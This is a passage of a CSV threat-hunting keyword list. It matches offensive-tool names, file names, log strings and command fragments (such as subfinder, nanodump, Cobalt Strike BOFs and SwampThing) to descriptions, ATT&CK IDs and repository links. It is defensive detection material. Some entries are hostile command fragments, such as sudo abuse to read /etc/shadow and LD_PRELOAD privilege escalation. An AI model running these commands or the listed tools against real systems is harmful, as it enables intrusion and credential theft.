T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*subdomain-wordlist.txt*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*subfinder -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*subfinder -silent -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*subfinder --silent*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*subfinder*,offensive_tool_keyword,subfinder,SubFinder is a subdomain discovery tool that discovers valid subdomains for any target using passive online sources.,T1210.001 - T1190 - T1574.001,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/subfinder/subfinder,1,0,N/A,N/A,10,8298,1128,2023-10-02T15:13:41Z,2018-03-31T09:44:57Z -*sublist3r -v -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Sublist3r*,offensive_tool_keyword,Sublist3r,Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.,T1210.001 - T1190 - T1574.001,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/aboul3la/Sublist3r,1,1,N/A,N/A,10,8697,2020,2023-10-01T21:58:10Z,2015-12-15T00:55:25Z -*Suborner.exe*,offensive_tool_keyword,Suborner,The Invisible Account Forger - A simple program to create a Windows account you will only know about ,T1098 - T1175 - T1033,TA0007 - TA0008 - TA0003,N/A,N/A,Persistence,https://github.com/r4wd3r/Suborner,1,1,N/A,N/A,5,452,58,2022-09-02T09:04:46Z,2022-04-26T00:12:58Z -*Suborner-master.zip*,offensive_tool_keyword,Suborner,The Invisible Account Forger - A simple program to create a Windows account you will only know about ,T1098 - T1175 - T1033,TA0007 - TA0008 - TA0003,N/A,N/A,Persistence,https://github.com/r4wd3r/Suborner,1,1,N/A,N/A,5,452,58,2022-09-02T09:04:46Z,2022-04-26T00:12:58Z -*Successfully connected* spawning shell?*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,0,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*Successfully cracked account password*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*Successfully dumped SAM and SYSTEM*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*sudo apache2 -f /etc/shadow*,greyware_tool_keyword,sudo,access sensitive files by abusing sudo permissions,T1548.001 - T1059.004,TA0004 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*sudo bloodhound*,offensive_tool_keyword,bloodhound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069,TA0007,N/A,N/A,Frameworks,https://github.com/fox-it/BloodHound.py,1,0,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*sudo LD_LIBRARY_PATH=. apache2*,greyware_tool_keyword,sudo,abusing LD_LIBRARY_PATH sudo option to escalade privilege,T1546.009 - T1059.004 - T1548.002,TA0004 - TA0002 - TA0003,N/A,N/A,Privilege Escalation,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*sudo LD_PRELOAD=/tmp/preload.so find*,greyware_tool_keyword,sudo,abusinf LD_PREDLOAD option to escalade privilege,T1546.009 - T1059.004 - T1548.002,TA0004 - TA0002 - TA0003,N/A,N/A,Privilege Escalation,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*sudo -nS id' && lse_sudo=true*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*sudo rmmod -r*,greyware_tool_keyword,rmmod,Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.,T1547.006 - T1070.006,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*sudo tmux new -s icebreaker*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*sudo_inject*,offensive_tool_keyword,sudo_inject,Privilege Escalation by injecting process possessing sudo tokens Inject process that have valid sudo token and activate our own sudo token,T1055 - T1548.001 - T1059.002,TA0002 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/nongiach/sudo_inject,1,1,N/A,N/A,7,649,122,2019-04-14T07:43:35Z,2019-03-24T22:06:22Z -*SUDO_KILLER*,offensive_tool_keyword,SUDO_KILLER,sudo exploitation #Abusing sudo #Exploiting Sudo #Linux Privilege Escalation #OSCP If you like the tool and for my personal motivation so as to develop other tools please a +1 star The tool can be used by pentesters. system admins. CTF players. students. System Auditors and trolls :).,T1078 - T1059 - T1204,TA0002 - TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/TH3xACE/SUDO_KILLER,1,1,N/A,N/A,10,1977,244,2023-08-02T08:53:48Z,2018-12-07T21:08:02Z -*sudomy.git*,offensive_tool_keyword,Sudomy,Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting,T1595 - T1046,TA0002,N/A,N/A,Reconnaissance,https://github.com/screetsec/Sudomy,1,1,N/A,N/A,10,1718,352,2023-09-19T08:38:55Z,2019-07-26T10:26:34Z -*sudopwn.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*SUID3NUM -*,offensive_tool_keyword,SUID3NUM,A standalone python2/3 script which utilizes pythons built-in modules to find SUID bins. separate default bins from custom bins. cross-match those with bins in GTFO Bins repository & auto-exploit those. all with colors! ( ?? ?? ??),T1168 - T1553 - T1210 - T1059,TA0001 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Anon-Exploiter/SUID3NUM,1,0,N/A,N/A,6,570,129,2021-08-15T20:37:50Z,2019-10-12T07:40:24Z -*sullo/nikto*,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -*SunloginClient_11.0.0.33162_X64.exe*,offensive_tool_keyword,POC,SunloginClient RCE vulnerable version,T1587,TA0001 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/sunlogin_rce,1,1,N/A,N/A,5,462,201,2022-02-16T16:11:42Z,2022-02-16T14:20:41Z -*superhedgy/AttackSurfaceMapper*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,1,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*Supernova.exe -*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*Supernova-main.zip*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,1,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*supershell*winpty.dll*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*supershell*winpty-agent.exe*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*SupportScam:Win32*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*surajpkhetani/AutoSmuggle*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,1,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*suspended_run *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*suspendresume.x64.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*suspendresume.x86.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*svc_stager.exe*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SW2_GetSyscallNumber*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Sh0ckFR/InlineWhispers2,1,1,N/A,10,10,172,29,2022-07-21T08:40:05Z,2021-11-16T12:47:35Z -*SW2_GetSyscallNumber*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*SW2_HashSyscall*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Sh0ckFR/InlineWhispers2,1,1,N/A,10,10,172,29,2022-07-21T08:40:05Z,2021-11-16T12:47:35Z -*SW2_PopulateSyscallList*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Sh0ckFR/InlineWhispers2,1,1,N/A,10,10,172,29,2022-07-21T08:40:05Z,2021-11-16T12:47:35Z -*SW2_PopulateSyscallList*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*SW2_RVA2VA*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Sh0ckFR/InlineWhispers2,1,1,N/A,10,10,172,29,2022-07-21T08:40:05Z,2021-11-16T12:47:35Z -*SW2_RVA2VA*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*SW3_GetSyscallAddress*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*swaks --to * --from * --header *Subject: * --body * --server *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*SwampThing.exe*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*SwampThing.exe*,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*SwampThing.pdb*,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*SwampThing.sln*,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*SWbemServicesImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*sweetpotato -p*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SweetPotato.cna*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,1,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -*SweetPotato.csproj*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - 